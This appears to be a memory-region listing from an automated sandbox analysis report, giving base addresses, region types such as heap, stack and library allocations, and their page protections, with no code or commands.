1C22DB65000
|
heap
|
page read and write
|
||
|
4FC2000
|
trusted library allocation
|
page read and write
|
||
|
2968000
|
heap
|
page read and write
|
||
|
56B6000
|
heap
|
page read and write
|
||
|
6E80000
|
heap
|
page read and write
|
||
|
137B1100000
|
heap
|
page execute and read and write
|
||
|
75EF9FE000
|
stack
|
page read and write
|
||
|
38A1000
|
heap
|
page read and write
|
||
|
5850000
|
trusted library allocation
|
page read and write
|
||
|
7FF886FA2000
|
trusted library allocation
|
page read and write
|
||
|
38B8000
|
heap
|
page read and write
|
||
|
38A0000
|
heap
|
page read and write
|
||
|
6E80000
|
direct allocation
|
page read and write
|
||
|
1C22DB18000
|
heap
|
page read and write
|
||
|
D75000
|
heap
|
page read and write
|
||
|
227BB000
|
stack
|
page read and write
|
||
|
56B6000
|
heap
|
page read and write
|
||
|
710000
|
direct allocation
|
page read and write
|
||
|
3260000
|
heap
|
page read and write
|
||
|
D52000
|
heap
|
page read and write
|
||
|
6D75000
|
heap
|
page execute and read and write
|
||
|
22E3C000
|
heap
|
page read and write
|
||
|
874E000
|
stack
|
page read and write
|
||
|
137A8CB1000
|
trusted library allocation
|
page read and write
|
||
|
22C92000
|
heap
|
page read and write
|
||
|
38B8000
|
heap
|
page read and write
|
||
|
13797092000
|
heap
|
page read and write
|
||
|
233C9000
|
unclassified section
|
page execute and read and write
|
||
|
7FF886FF0000
|
trusted library allocation
|
page read and write
|
||
|
D47000
|
heap
|
page read and write
|
||
|
371C000
|
heap
|
page read and write
|
||
|
1C22DB90000
|
heap
|
page read and write
|
||
|
1C22DA90000
|
heap
|
page read and write
|
||
|
780000
|
direct allocation
|
page read and write
|
||
|
5980000
|
heap
|
page read and write
|
||
|
547B000
|
heap
|
page read and write
|
||
|
137B1167000
|
heap
|
page execute and read and write
|
||
|
2F79000
|
stack
|
page read and write
|
||
|
3040000
|
heap
|
page read and write
|
||
|
D70000
|
heap
|
page read and write
|
||
|
135000
|
heap
|
page read and write
|
||
|
2F10000
|
heap
|
page read and write
|
||
|
41B000
|
system
|
page execute and read and write
|
||
|
6EB0000
|
direct allocation
|
page read and write
|
||
|
D60000
|
heap
|
page read and write
|
||
|
2F08000
|
heap
|
page read and write
|
||
|
D86000
|
heap
|
page read and write
|
||
|
1C22FAC6000
|
heap
|
page read and write
|
||
|
3044000
|
heap
|
page read and write
|
||
|
1C22DBBB000
|
heap
|
page read and write
|
||
|
D71000
|
heap
|
page read and write
|
||
|
5CF000
|
heap
|
page read and write
|
||
|
5BBD000
|
heap
|
page read and write
|
||
|
5675000
|
heap
|
page read and write
|
||
|
5693000
|
heap
|
page read and write
|
||
|
D62000
|
heap
|
page read and write
|
||
|
7427000
|
heap
|
page read and write
|
||
|
1C22DAC9000
|
heap
|
page read and write
|
||
|
66E000
|
stack
|
page read and write
|
||
|
38AF000
|
heap
|
page read and write
|
||
|
1C22DB83000
|
heap
|
page read and write
|
||
|
7FF887010000
|
trusted library allocation
|
page read and write
|
||
|
1F3B2DD0000
|
heap
|
page read and write
|
||
|
5551000
|
heap
|
page read and write
|
||
|
980000
|
heap
|
page read and write
|
||
|
4F5F000
|
stack
|
page read and write
|
||
|
1C22DB6C000
|
heap
|
page read and write
|
||
|
579000
|
heap
|
page read and write
|
||
|
3146000
|
heap
|
page read and write
|
||
|
3880000
|
heap
|
page read and write
|
||
|
38BB000
|
heap
|
page read and write
|
||
|
D70000
|
heap
|
page read and write
|
||
|
38B8000
|
heap
|
page read and write
|
||
|
D7D000
|
heap
|
page read and write
|
||
|
22B7E000
|
stack
|
page read and write
|
||
|
D35000
|
heap
|
page read and write
|
||
|
1C22FAB2000
|
heap
|
page read and write
|
||
|
8280000
|
trusted library allocation
|
page read and write
|
||
|
22C38000
|
heap
|
page read and write
|
||
|
137B0FF0000
|
heap
|
page read and write
|
||
|
1C22DA98000
|
heap
|
page read and write
|
||
|
D70000
|
heap
|
page read and write
|
||
|
1C22DB35000
|
heap
|
page read and write
|
||
|
3140000
|
heap
|
page read and write
|
||
|
137994FE000
|
trusted library allocation
|
page read and write
|
||
|
5659000
|
heap
|
page read and write
|
||
|
5650000
|
heap
|
page read and write
|
||
|
223EC000
|
unkown
|
page read and write
|
||
|
82D0000
|
trusted library allocation
|
page read and write
|
||
|
D60000
|
heap
|
page read and write
|
||
|
73F9000
|
heap
|
page read and write
|
||
|
398B000
|
heap
|
page read and write
|
||
|
38A1000
|
heap
|
page read and write
|
||
|
7FF886FE0000
|
trusted library allocation
|
page read and write
|
||
|
3495000
|
heap
|
page read and write
|
||
|
2F2F000
|
stack
|
page read and write
|
||
|
38AE000
|
heap
|
page read and write
|
||
|
38B5000
|
heap
|
page read and write
|
||
|
7730000
|
trusted library allocation
|
page read and write
|
||
|
1C22DB09000
|
heap
|
page read and write
|
||
|
1C22DB8D000
|
heap
|
page read and write
|
||
|
3340000
|
heap
|
page read and write
|
||
|
38B8000
|
heap
|
page read and write
|
||
|
84CE000
|
stack
|
page read and write
|
||
|
2F05000
|
trusted library allocation
|
page execute and read and write
|
||
|
1379AA9E000
|
trusted library allocation
|
page read and write
|
||
|
2F00000
|
trusted library allocation
|
page read and write
|
||
|
1C22DB54000
|
heap
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
22AF0000
|
unclassified section
|
page execute and read and write
|
||
|
3688000
|
heap
|
page read and write
|
||
|
39424FF000
|
unkown
|
page read and write
|
||
|
13797210000
|
heap
|
page readonly
|
||
|
75EFEFE000
|
stack
|
page read and write
|
||
|
3494000
|
heap
|
page read and write
|
||
|
398A000
|
heap
|
page read and write
|
||
|
22C39000
|
heap
|
page read and write
|
||
|
1379AAAC000
|
trusted library allocation
|
page read and write
|
||
|
D5C000
|
heap
|
page read and write
|
||
|
3140000
|
heap
|
page read and write
|
||
|
2DAD000
|
stack
|
page read and write
|
||
|
1C22DB90000
|
heap
|
page read and write
|
||
|
D84000
|
heap
|
page read and write
|
||
|
3044000
|
heap
|
page read and write
|
||
|
2ED8000
|
heap
|
page read and write
|
||
|
D60000
|
heap
|
page read and write
|
||
|
137970B2000
|
heap
|
page read and write
|
||
|
1C22F832000
|
heap
|
page read and write
|
||
|
D8A000
|
heap
|
page read and write
|
||
|
5E2000
|
heap
|
page read and write
|
||
|
29EE000
|
stack
|
page read and write
|
||
|
2BFD000
|
stack
|
page read and write
|
||
|
727E000
|
stack
|
page read and write
|
||
|
1C22DB5A000
|
heap
|
page read and write
|
||
|
87A0000
|
trusted library allocation
|
page read and write
|
||
|
137971E0000
|
trusted library allocation
|
page read and write
|
||
|
46D0000
|
trusted library allocation
|
page read and write
|
||
|
D8C000
|
heap
|
page read and write
|
||
|
22E3C000
|
heap
|
page read and write
|
||
|
1379ABB8000
|
trusted library allocation
|
page read and write
|
||
|
22F70000
|
heap
|
page read and write
|
||
|
6C0000
|
direct allocation
|
page read and write
|
||
|
1C22F811000
|
heap
|
page read and write
|
||
|
38B8000
|
heap
|
page read and write
|
||
|
1C22F811000
|
heap
|
page read and write
|
||
|
D79000
|
heap
|
page read and write
|
||
|
5850000
|
trusted library allocation
|
page read and write
|
||
|
5850000
|
trusted library allocation
|
page read and write
|
||
|
D86000
|
heap
|
page read and write
|
||
|
1C22DBBB000
|
heap
|
page read and write
|
||
|
137994BB000
|
trusted library allocation
|
page read and write
|
||
|
5695000
|
heap
|
page read and write
|
||
|
5658000
|
heap
|
page read and write
|
||
|
38B1000
|
heap
|
page read and write
|
||
|
30BF000
|
stack
|
page read and write
|
||
|
1C22DBBB000
|
heap
|
page read and write
|
||
|
13797250000
|
trusted library allocation
|
page read and write
|
||
|
1F3B2DE0000
|
heap
|
page read and write
|
||
|
5693000
|
heap
|
page read and write
|
||
|
38A1000
|
heap
|
page read and write
|
||
|
D79000
|
heap
|
page read and write
|
||
|
38B8000
|
heap
|
page read and write
|
||
|
35C4000
|
heap
|
page read and write
|
||
|
38A0000
|
heap
|
page read and write
|
||
|
38AF000
|
heap
|
page read and write
|
||
|
878D000
|
stack
|
page read and write
|
||
|
6D0000
|
direct allocation
|
page read and write
|
||
|
740000
|
direct allocation
|
page read and write
|
||
|
13798D34000
|
trusted library allocation
|
page read and write
|
||
|
38B5000
|
heap
|
page read and write
|
||
|
D52000
|
heap
|
page read and write
|
||
|
22F71000
|
heap
|
page read and write
|
||
|
1C22F850000
|
heap
|
page read and write
|
||
|
8150000
|
trusted library allocation
|
page execute and read and write
|
||
|
29AE000
|
stack
|
page read and write
|
||
|
38B5000
|
heap
|
page read and write
|
||
|
7710000
|
trusted library allocation
|
page read and write
|
||
|
7020000
|
direct allocation
|
page read and write
|
||
|
7010000
|
direct allocation
|
page read and write
|
||
|
7FF886F71000
|
trusted library allocation
|
page read and write
|
||
|
9AAD000
|
direct allocation
|
page execute and read and write
|
||
|
13798CA0000
|
heap
|
page read and write
|
||
|
6BFE000
|
stack
|
page read and write
|
||
|
1BE000
|
stack
|
page read and write
|
||
|
C00000
|
heap
|
page read and write
|
||
|
2950000
|
heap
|
page read and write
|
||
|
7FF887050000
|
trusted library allocation
|
page read and write
|
||
|
D65000
|
heap
|
page read and write
|
||
|
56B6000
|
heap
|
page read and write
|
||
|
2F02000
|
trusted library allocation
|
page read and write
|
||
|
22810FE000
|
stack
|
page read and write
|
||
|
13797170000
|
heap
|
page read and write
|
||
|
1C22FAC4000
|
heap
|
page read and write
|
||
|
77AB000
|
stack
|
page read and write
|
||
|
22C9D000
|
heap
|
page read and write
|
||
|
1C22F852000
|
heap
|
page read and write
|
||
|
1C22DB54000
|
heap
|
page read and write
|
||
|
13797090000
|
heap
|
page read and write
|
||
|
38A8000
|
heap
|
page read and write
|
||
|
56B6000
|
heap
|
page read and write
|
||
|
4810000
|
trusted library allocation
|
page execute and read and write
|
||
|
5659000
|
heap
|
page read and write
|
||
|
4AF8000
|
heap
|
page read and write
|
||
|
8170000
|
trusted library allocation
|
page read and write
|
||
|
3044000
|
heap
|
page read and write
|
||
|
13797200000
|
trusted library allocation
|
page read and write
|
||
|
22100000
|
heap
|
page read and write
|
||
|
D84000
|
heap
|
page read and write
|
||
|
7FF887040000
|
trusted library allocation
|
page read and write
|
||
|
568A000
|
heap
|
page read and write
|
||
|
22118000
|
heap
|
page read and write
|
||
|
22DC3000
|
heap
|
page read and write
|
||
|
2287E000
|
stack
|
page read and write
|
||
|
1F3B2E00000
|
heap
|
page read and write
|
||
|
456000
|
system
|
page execute and read and write
|
||
|
3494000
|
heap
|
page read and write
|
||
|
D60000
|
heap
|
page read and write
|
||
|
D7D000
|
heap
|
page read and write
|
||
|
5659000
|
heap
|
page read and write
|
||
|
56B6000
|
heap
|
page read and write
|
||
|
72D2000
|
heap
|
page read and write
|
||
|
22CD0000
|
heap
|
page read and write
|
||
|
1C22DB54000
|
heap
|
page read and write
|
||
|
567B000
|
heap
|
page read and write
|
||
|
1C22F810000
|
heap
|
page read and write
|
||
|
6C3E000
|
stack
|
page read and write
|
||
|
B8AD000
|
direct allocation
|
page execute and read and write
|
||
|
1C22DBAE000
|
heap
|
page read and write
|
||
|
D60000
|
heap
|
page read and write
|
||
|
1C22FAAD000
|
heap
|
page read and write
|
||
|
D73000
|
heap
|
page read and write
|
||
|
59CD000
|
remote allocation
|
page execute and read and write
|
||
|
22670000
|
heap
|
page read and write
|
||
|
137A8D23000
|
trusted library allocation
|
page read and write
|
||
|
38AD000
|
heap
|
page read and write
|
||
|
BD0000
|
heap
|
page read and write
|
||
|
6E0000
|
direct allocation
|
page read and write
|
||
|
7FF8870B0000
|
trusted library allocation
|
page read and write
|
||
|
33A0000
|
heap
|
page read and write
|
||
|
38AC000
|
heap
|
page read and write
|
||
|
38A1000
|
heap
|
page read and write
|
||
|
137B10AD000
|
heap
|
page read and write
|
||
|
137994E0000
|
trusted library allocation
|
page read and write
|
||
|
670000
|
heap
|
page readonly
|
||
|
8290000
|
heap
|
page read and write
|
||
|
137970E1000
|
heap
|
page read and write
|
||
|
228228B000
|
stack
|
page read and write
|
||
|
38AD000
|
heap
|
page read and write
|
||
|
56B6000
|
heap
|
page read and write
|
||
|
3277000
|
stack
|
page read and write
|
||
|
D84000
|
heap
|
page read and write
|
||
|
1C22F836000
|
heap
|
page read and write
|
||
|
2258E000
|
stack
|
page read and write
|
||
|
7FF886DC0000
|
trusted library allocation
|
page read and write
|
||
|
8530000
|
heap
|
page read and write
|
||
|
32B0000
|
heap
|
page read and write
|
||
|
6E70000
|
direct allocation
|
page read and write
|
||
|
5EC000
|
heap
|
page read and write
|
||
|
76C0000
|
trusted library allocation
|
page read and write
|
||
|
323E000
|
stack
|
page read and write
|
||
|
225E0000
|
remote allocation
|
page read and write
|
||
|
38B8000
|
heap
|
page read and write
|
||
|
1379915C000
|
trusted library allocation
|
page read and write
|
||
|
38B1000
|
heap
|
page read and write
|
||
|
38A5000
|
heap
|
page read and write
|
||
|
A5B000
|
stack
|
page read and write
|
||
|
2E7C000
|
stack
|
page read and write
|
||
|
170000
|
heap
|
page read and write
|
||
|
D84000
|
heap
|
page read and write
|
||
|
2273E000
|
stack
|
page read and write
|
||
|
7760000
|
trusted library allocation
|
page read and write
|
||
|
2239F000
|
stack
|
page read and write
|
||
|
2EA0000
|
trusted library section
|
page read and write
|
||
|
4F31000
|
heap
|
page read and write
|
||
|
1C22DAF0000
|
heap
|
page read and write
|
||
|
2F30000
|
heap
|
page read and write
|
||
|
5675000
|
heap
|
page read and write
|
||
|
5680000
|
heap
|
page read and write
|
||
|
1C22DAF0000
|
heap
|
page read and write
|
||
|
5850000
|
trusted library allocation
|
page read and write
|
||
|
38B8000
|
heap
|
page read and write
|
||
|
1C22F823000
|
heap
|
page read and write
|
||
|
6B0000
|
direct allocation
|
page read and write
|
||
|
2280E7E000
|
stack
|
page read and write
|
||
|
22B21000
|
direct allocation
|
page execute and read and write
|
||
|
2EE9000
|
trusted library allocation
|
page read and write
|
||
|
73C0000
|
trusted library allocation
|
page read and write
|
||
|
5651000
|
heap
|
page read and write
|
||
|
56B6000
|
heap
|
page read and write
|
||
|
1379AA8C000
|
trusted library allocation
|
page read and write
|
||
|
5651000
|
heap
|
page read and write
|
||
|
398B000
|
heap
|
page read and write
|
||
|
7FF8870D0000
|
trusted library allocation
|
page read and write
|
||
|
BD000
|
stack
|
page read and write
|
||
|
821E000
|
stack
|
page read and write
|
||
|
13797305000
|
heap
|
page read and write
|
||
|
D8A000
|
heap
|
page read and write
|
||
|
7680000
|
trusted library allocation
|
page execute and read and write
|
||
|
13799178000
|
trusted library allocation
|
page read and write
|
||
|
D67000
|
heap
|
page read and write
|
||
|
C10000
|
heap
|
page read and write
|
||
|
33C0000
|
heap
|
page read and write
|
||
|
8220000
|
heap
|
page read and write
|
||
|
AEAD000
|
direct allocation
|
page execute and read and write
|
||
|
22C94000
|
heap
|
page read and write
|
||
|
75F01FB000
|
stack
|
page read and write
|
||
|
569D000
|
heap
|
page read and write
|
||
|
38B8000
|
heap
|
page read and write
|
||
|
730000
|
direct allocation
|
page read and write
|
||
|
4F8000
|
heap
|
page read and write
|
||
|
56B6000
|
heap
|
page read and write
|
||
|
3044000
|
heap
|
page read and write
|
||
|
6E90000
|
direct allocation
|
page read and write
|
||
|
3044000
|
heap
|
page read and write
|
||
|
1C22DB8B000
|
heap
|
page read and write
|
||
|
5680000
|
heap
|
page read and write
|
||
|
341E000
|
stack
|
page read and write
|
||
|
38B1000
|
heap
|
page read and write
|
||
|
1C22DB65000
|
heap
|
page read and write
|
||
|
2EEE000
|
stack
|
page read and write
|
||
|
35C0000
|
trusted library allocation
|
page read and write
|
||
|
D66000
|
heap
|
page read and write
|
||
|
56B6000
|
heap
|
page read and write
|
||
|
3044000
|
heap
|
page read and write
|
||
|
1C22DB81000
|
heap
|
page read and write
|
||
|
1C22DB6C000
|
heap
|
page read and write
|
||
|
73E9000
|
heap
|
page read and write
|
||
|
3494000
|
heap
|
page read and write
|
||
|
38AE000
|
heap
|
page read and write
|
||
|
137971A0000
|
heap
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
22811FE000
|
stack
|
page read and write
|
||
|
2F1A000
|
heap
|
page read and write
|
||
|
7FF887120000
|
trusted library allocation
|
page read and write
|
||
|
38B6000
|
heap
|
page read and write
|
||
|
226BC000
|
stack
|
page read and write
|
||
|
2344C000
|
unclassified section
|
page execute and read and write
|
||
|
34AF000
|
stack
|
page read and write
|
||
|
6D70000
|
heap
|
page execute and read and write
|
||
|
473000
|
system
|
page execute and read and write
|
||
|
1C22DB58000
|
heap
|
page read and write
|
||
|
38AD000
|
heap
|
page read and write
|
||
|
38BA000
|
heap
|
page read and write
|
||
|
38B8000
|
heap
|
page read and write
|
||
|
D47000
|
heap
|
page read and write
|
||
|
3148000
|
heap
|
page read and write
|
||
|
3044000
|
heap
|
page read and write
|
||
|
2FE0000
|
heap
|
page read and write
|
||
|
6FE0000
|
direct allocation
|
page read and write
|
||
|
E5E000
|
stack
|
page read and write
|
||
|
2349C000
|
stack
|
page read and write
|
||
|
D4B000
|
heap
|
page read and write
|
||
|
32FE000
|
stack
|
page read and write
|
||
|
4881000
|
trusted library allocation
|
page read and write
|
||
|
233E3000
|
unclassified section
|
page execute and read and write
|
||
|
38A9000
|
heap
|
page read and write
|
||
|
56B6000
|
heap
|
page read and write
|
||
|
D4A000
|
heap
|
page read and write
|
||
|
D87000
|
heap
|
page read and write
|
||
|
38B8000
|
heap
|
page read and write
|
||
|
D8C000
|
heap
|
page read and write
|
||
|
3293000
|
stack
|
page read and write
|
||
|
92E000
|
stack
|
page read and write
|
||
|
6A0000
|
direct allocation
|
page read and write
|
||
|
1C22F836000
|
heap
|
page read and write
|
||
|
1379AA88000
|
trusted library allocation
|
page read and write
|
||
|
220FE000
|
stack
|
page read and write
|
||
|
38A1000
|
heap
|
page read and write
|
||
|
137B12D3000
|
heap
|
page read and write
|
||
|
8EF000
|
unkown
|
page read and write
|
||
|
5675000
|
heap
|
page read and write
|
||
|
8870000
|
trusted library allocation
|
page execute and read and write
|
||
|
760000
|
direct allocation
|
page read and write
|
||
|
3989000
|
heap
|
page read and write
|
||
|
D7F000
|
heap
|
page read and write
|
||
|
1C22DB7D000
|
heap
|
page read and write
|
||
|
1C22DB65000
|
heap
|
page read and write
|
||
|
56B6000
|
heap
|
page read and write
|
||
|
4D0000
|
heap
|
page read and write
|
||
|
6D50000
|
direct allocation
|
page read and write
|
||
|
56B6000
|
heap
|
page read and write
|
||
|
74D3000
|
heap
|
page read and write
|
||
|
1C22DB5B000
|
heap
|
page read and write
|
||
|
567B000
|
heap
|
page read and write
|
||
|
5EC000
|
heap
|
page read and write
|
||
|
5891000
|
trusted library allocation
|
page read and write
|
||
|
1C22FA99000
|
heap
|
page read and write
|
||
|
22C92000
|
heap
|
page read and write
|
||
|
D62000
|
heap
|
page read and write
|
||
|
D5E000
|
heap
|
page read and write
|
||
|
98B000
|
heap
|
page read and write
|
||
|
45C000
|
system
|
page execute and read and write
|
||
|
BE0000
|
heap
|
page read and write
|
||
|
38A1000
|
heap
|
page read and write
|
||
|
8160000
|
trusted library allocation
|
page read and write
|
||
|
1C22DB73000
|
heap
|
page read and write
|
||
|
228153E000
|
stack
|
page read and write
|
||
|
233F0000
|
unclassified section
|
page execute and read and write
|
||
|
1C22DB5F000
|
heap
|
page read and write
|
||
|
398A000
|
heap
|
page read and write
|
||
|
2280F3E000
|
stack
|
page read and write
|
||
|
1C22F81C000
|
heap
|
page read and write
|
||
|
228BD000
|
stack
|
page read and write
|
||
|
75AE000
|
stack
|
page read and write
|
||
|
7FF886DC3000
|
trusted library allocation
|
page execute and read and write
|
||
|
137A8FAC000
|
trusted library allocation
|
page read and write
|
||
|
307E000
|
stack
|
page read and write
|
||
|
7050000
|
heap
|
page read and write
|
||
|
1379705B000
|
heap
|
page read and write
|
||
|
7530000
|
trusted library allocation
|
page read and write
|
||
|
38B8000
|
heap
|
page read and write
|
||
|
3680000
|
heap
|
page read and write
|
||
|
3494000
|
heap
|
page read and write
|
||
|
137B1326000
|
heap
|
page read and write
|
||
|
2ED0000
|
heap
|
page read and write
|
||
|
398A000
|
heap
|
page read and write
|
||
|
4760000
|
heap
|
page readonly
|
||
|
8140000
|
heap
|
page read and write
|
||
|
2DEE000
|
unkown
|
page read and write
|
||
|
1C22DB5F000
|
heap
|
page read and write
|
||
|
22C74000
|
heap
|
page read and write
|
||
|
C20000
|
heap
|
page read and write
|
||
|
398A000
|
heap
|
page read and write
|
||
|
1C22DB6C000
|
heap
|
page read and write
|
||
|
1C22DBA9000
|
heap
|
page read and write
|
||
|
32F0000
|
heap
|
page read and write
|
||
|
2960000
|
heap
|
page read and write
|
||
|
B40000
|
heap
|
page read and write
|
||
|
331E000
|
stack
|
page read and write
|
||
|
6FD0000
|
direct allocation
|
page read and write
|
||
|
394217D000
|
stack
|
page read and write
|
||
|
50AF000
|
stack
|
page read and write
|
||
|
1C22DB90000
|
heap
|
page read and write
|
||
|
36DE000
|
stack
|
page read and write
|
||
|
475F000
|
stack
|
page read and write
|
||
|
D6D000
|
heap
|
page read and write
|
||
|
2EFA000
|
trusted library allocation
|
page execute and read and write
|
||
|
2C3E000
|
stack
|
page read and write
|
||
|
7FF886E70000
|
trusted library allocation
|
page read and write
|
||
|
3494000
|
heap
|
page read and write
|
||
|
5658000
|
heap
|
page read and write
|
||
|
22450000
|
direct allocation
|
page read and write
|
||
|
75EF579000
|
stack
|
page read and write
|
||
|
D52000
|
heap
|
page read and write
|
||
|
D6B000
|
heap
|
page read and write
|
||
|
398B000
|
heap
|
page read and write
|
||
|
1C22DB5F000
|
heap
|
page read and write
|
||
|
13797096000
|
heap
|
page read and write
|
||
|
1C22DB09000
|
heap
|
page read and write
|
||
|
744F000
|
heap
|
page read and write
|
||
|
56B6000
|
heap
|
page read and write
|
||
|
5551000
|
heap
|
page read and write
|
||
|
1C22F82F000
|
heap
|
page read and write
|
||
|
7FF886DC2000
|
trusted library allocation
|
page read and write
|
||
|
5ABF000
|
heap
|
page read and write
|
||
|
6FF0000
|
direct allocation
|
page read and write
|
||
|
137B12B7000
|
heap
|
page read and write
|
||
|
854F000
|
heap
|
page read and write
|
||
|
1C22DB22000
|
heap
|
page read and write
|
||
|
228163E000
|
stack
|
page read and write
|
||
|
38B1000
|
heap
|
page read and write
|
||
|
346E000
|
stack
|
page read and write
|
||
|
38B8000
|
heap
|
page read and write
|
||
|
4F31000
|
heap
|
page read and write
|
||
|
5680000
|
heap
|
page read and write
|
||
|
8790000
|
trusted library allocation
|
page execute and read and write
|
||
|
7700000
|
trusted library allocation
|
page read and write
|
||
|
2283C000
|
stack
|
page read and write
|
||
|
38A9000
|
heap
|
page read and write
|
||
|
137B1270000
|
heap
|
page read and write
|
||
|
D8B000
|
heap
|
page read and write
|
||
|
4FCD000
|
remote allocation
|
page execute and read and write
|
||
|
81DD000
|
stack
|
page read and write
|
||
|
D82000
|
heap
|
page read and write
|
||
|
225E0000
|
remote allocation
|
page read and write
|
||
|
2261E000
|
stack
|
page read and write
|
||
|
7FF886FC0000
|
trusted library allocation
|
page read and write
|
||
|
BC0000
|
heap
|
page read and write
|
||
|
22C8D000
|
heap
|
page read and write
|
||
|
D80000
|
heap
|
page read and write
|
||
|
1C22DB70000
|
heap
|
page read and write
|
||
|
22EDB000
|
heap
|
page read and write
|
||
|
A4AD000
|
direct allocation
|
page execute and read and write
|
||
|
5556000
|
heap
|
page read and write
|
||
|
1379709C000
|
heap
|
page read and write
|
||
|
3240000
|
heap
|
page read and write
|
||
|
76D0000
|
trusted library allocation
|
page read and write
|
||
|
7FF887070000
|
trusted library allocation
|
page read and write
|
||
|
13798BE0000
|
heap
|
page execute and read and write
|
||
|
1C22FA95000
|
heap
|
page read and write
|
||
|
22C7E000
|
heap
|
page read and write
|
||
|
22C45000
|
heap
|
page read and write
|
||
|
137B12D5000
|
heap
|
page read and write
|
||
|
471E000
|
stack
|
page read and write
|
||
|
1F3B2FF0000
|
heap
|
page read and write
|
||
|
72BF000
|
stack
|
page read and write
|
||
|
D91000
|
heap
|
page read and write
|
||
|
56B6000
|
heap
|
page read and write
|
||
|
3494000
|
heap
|
page read and write
|
||
|
D94000
|
heap
|
page read and write
|
||
|
38AB000
|
heap
|
page read and write
|
||
|
7FF887090000
|
trusted library allocation
|
page read and write
|
||
|
3044000
|
heap
|
page read and write
|
||
|
1C22F81C000
|
heap
|
page read and write
|
||
|
22E6A000
|
heap
|
page read and write
|
||
|
567B000
|
heap
|
page read and write
|
||
|
D7D000
|
heap
|
page read and write
|
||
|
2F00000
|
heap
|
page read and write
|
||
|
2FCF000
|
stack
|
page read and write
|
||
|
5656000
|
heap
|
page read and write
|
||
|
5850000
|
trusted library allocation
|
page read and write
|
||
|
7FF886F60000
|
trusted library allocation
|
page read and write
|
||
|
5850000
|
heap
|
page read and write
|
||
|
1C22DB93000
|
heap
|
page read and write
|
||
|
13799168000
|
trusted library allocation
|
page read and write
|
||
|
56B6000
|
heap
|
page read and write
|
||
|
1C22DB93000
|
heap
|
page read and write
|
||
|
4FDC000
|
trusted library allocation
|
page read and write
|
||
|
750000
|
direct allocation
|
page read and write
|
||
|
D94000
|
heap
|
page read and write
|
||
|
62E000
|
stack
|
page read and write
|
||
|
1C22DA95000
|
heap
|
page read and write
|
||
|
762E000
|
stack
|
page read and write
|
||
|
5675000
|
heap
|
page read and write
|
||
|
D6B000
|
heap
|
page read and write
|
||
|
137970DB000
|
heap
|
page read and write
|
||
|
325C000
|
stack
|
page read and write
|
||
|
1F3B2E20000
|
heap
|
page read and write
|
||
|
7FF886EE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C22DB86000
|
heap
|
page read and write
|
||
|
565F000
|
heap
|
page read and write
|
||
|
38A9000
|
heap
|
page read and write
|
||
|
3044000
|
heap
|
page read and write
|
||
|
38B5000
|
heap
|
page read and write
|
||
|
13798ACD000
|
heap
|
page read and write
|
||
|
5D2000
|
heap
|
page read and write
|
||
|
137B1500000
|
heap
|
page read and write
|
||
|
22BC1000
|
heap
|
page read and write
|
||
|
3490000
|
heap
|
page read and write
|
||
|
1C22DB93000
|
heap
|
page read and write
|
||
|
22A7D000
|
stack
|
page read and write
|
||
|
398A000
|
heap
|
page read and write
|
||
|
23370000
|
unclassified section
|
page execute and read and write
|
||
|
289C000
|
stack
|
page read and write
|
||
|
1C22DB8E000
|
heap
|
page read and write
|
||
|
2EA0000
|
heap
|
page read and write
|
||
|
D67000
|
heap
|
page read and write
|
||
|
D75000
|
heap
|
page read and write
|
||
|
1C22DAC0000
|
heap
|
page read and write
|
||
|
5551000
|
heap
|
page read and write
|
||
|
38A0000
|
heap
|
page read and write
|
||
|
7FF886FB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7F7B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
4820000
|
heap
|
page execute and read and write
|
||
|
38AF000
|
heap
|
page read and write
|
||
|
13797315000
|
heap
|
page read and write
|
||
|
22470000
|
direct allocation
|
page read and write
|
||
|
5658000
|
heap
|
page read and write
|
||
|
7DF45D9D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2D3A000
|
heap
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
7FF8870C0000
|
trusted library allocation
|
page read and write
|
||
|
1C22DA99000
|
heap
|
page read and write
|
||
|
2F1F000
|
heap
|
page read and write
|
||
|
720000
|
direct allocation
|
page read and write
|
||
|
13799166000
|
trusted library allocation
|
page read and write
|
||
|
2F58000
|
heap
|
page read and write
|
||
|
8355000
|
trusted library allocation
|
page read and write
|
||
|
22440000
|
direct allocation
|
page read and write
|
||
|
1C22F853000
|
heap
|
page read and write
|
||
|
569D000
|
heap
|
page read and write
|
||
|
2280BC3000
|
stack
|
page read and write
|
||
|
D8F000
|
heap
|
page read and write
|
||
|
56B6000
|
heap
|
page read and write
|
||
|
D41000
|
heap
|
page read and write
|
||
|
459000
|
system
|
page execute and read and write
|
||
|
33C0000
|
heap
|
page read and write
|
||
|
30EC000
|
heap
|
page read and write
|
||
|
38B5000
|
heap
|
page read and write
|
||
|
22C92000
|
heap
|
page read and write
|
||
|
7FF886DDC000
|
trusted library allocation
|
page read and write
|
||
|
325F000
|
stack
|
page read and write
|
||
|
1379937A000
|
trusted library allocation
|
page read and write
|
||
|
766D000
|
stack
|
page read and write
|
||
|
3044000
|
heap
|
page read and write
|
||
|
56B6000
|
heap
|
page read and write
|
||
|
52FF000
|
stack
|
page read and write
|
||
|
D28000
|
heap
|
page read and write
|
||
|
565C000
|
heap
|
page read and write
|
||
|
8510000
|
heap
|
page read and write
|
||
|
224FF000
|
stack
|
page read and write
|
||
|
75EFCFE000
|
stack
|
page read and write
|
||
|
3494000
|
heap
|
page read and write
|
||
|
3494000
|
heap
|
page read and write
|
||
|
850C000
|
stack
|
page read and write
|
||
|
38B5000
|
heap
|
page read and write
|
||
|
22F71000
|
heap
|
page read and write
|
||
|
1FE000
|
stack
|
page read and write
|
||
|
1C22DB5F000
|
heap
|
page read and write
|
||
|
1C22FA98000
|
heap
|
page read and write
|
||
|
1C22DAEC000
|
heap
|
page read and write
|
||
|
398A000
|
heap
|
page read and write
|
||
|
3713000
|
heap
|
page read and write
|
||
|
35CF000
|
heap
|
page read and write
|
||
|
1C22DBA9000
|
heap
|
page read and write
|
||
|
87D0000
|
trusted library allocation
|
page read and write
|
||
|
38A1000
|
heap
|
page read and write
|
||
|
398A000
|
heap
|
page read and write
|
||
|
38A0000
|
heap
|
page read and write
|
||
|
22C94000
|
heap
|
page read and write
|
||
|
38B5000
|
heap
|
page read and write
|
||
|
56B6000
|
heap
|
page read and write
|
||
|
47CC000
|
stack
|
page read and write
|
||
|
45D000
|
system
|
page execute and read and write
|
||
|
3044000
|
heap
